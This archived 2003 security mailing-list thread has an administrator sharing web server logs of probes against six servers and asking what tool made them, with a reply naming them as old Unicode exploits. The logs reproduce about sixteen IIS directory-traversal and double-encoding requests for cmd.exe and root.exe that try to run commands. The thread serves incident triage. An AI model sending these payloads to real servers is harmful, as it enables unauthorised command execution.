|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Re: Anyone know this tool?
From: Danny (danny
eboundary.com)
Date: Tue Jul 29 2003 - 12:04:47 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
I know what the exploits are :) I was curious if anyone had seen the
same combination of scans and/or knew which tool generated them.
I would assume it is a newish tool because I've not been able to find
the pattern in my logs going back 6-8 months.
On Tuesday, July 29, 2003, at 12:42 PM, James Williams wrote:
> Looks like old Unicode exploits. Those scanners are all over the place.
> You could probably go to packetstormsecurity.nl and search for
> "Unicode"
> and find one.
>
> James Williams
> Network Systems Engineer
> West Texas A&M University
> http://www.wtamu.edu
> Phone: 806-651-2162
> Email: jwilliamsmail.wtamu.edu
>
>
> -----Original Message-----
> From: Danny [mailto:dannyeboundary.com]
> Sent: Monday, July 28, 2003 10:24 PM
> To: incidentssecurityfocus.com
> Subject: Anyone know this tool?
>
> Does anyone happen to know what tool this is? I've seen the exact same
> scans on 6 of our servers on completely different networks. All the
> scans have been from different source IP's and all the servers were hit
>
> within a space of a few hours.
>
> Curiosity is getting the better of me since i've never seen this exact
> pattern before :)
>
> 64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
> 64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET
> /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
> 64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
> 64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
> 64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-"
> "-"
> 64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 - "-" "-"
> 64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 - "-" "-"
> 64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../
> winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
> 64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-"
> "-"
> 64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-"
> "-"
> 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-"
> "-"
> 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-"
> "-"
> 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-"
> "-"
> 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-"
> "-"
> 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
> "-" "-"
> 64.180.241.204 - - [28/Jul/2003:22:18:43 -0500] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-"
> "-"
>
> Danny
> Work - http://www.eBoundary.com - Secure, FreeBSD hosting.
> Play - http://www.eBoundary.net - Who really sets your electronic
> boundaries?
> AIM: eBoundaryTch | ICQ: 3090141
>
>
> -----------------------------------------------------------------------
> -
> ---
> -----------------------------------------------------------------------
> -
> ----
>
>
>
>
Danny
Work - http://www.eBoundary.com - Secure, FreeBSD hosting.
Play - http://www.eBoundary.net - Who really sets your electronic
boundaries?
AIM: eBoundaryTch | ICQ: 3090141
---------------------------------------------------------------------------
----------------------------------------------------------------------------
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]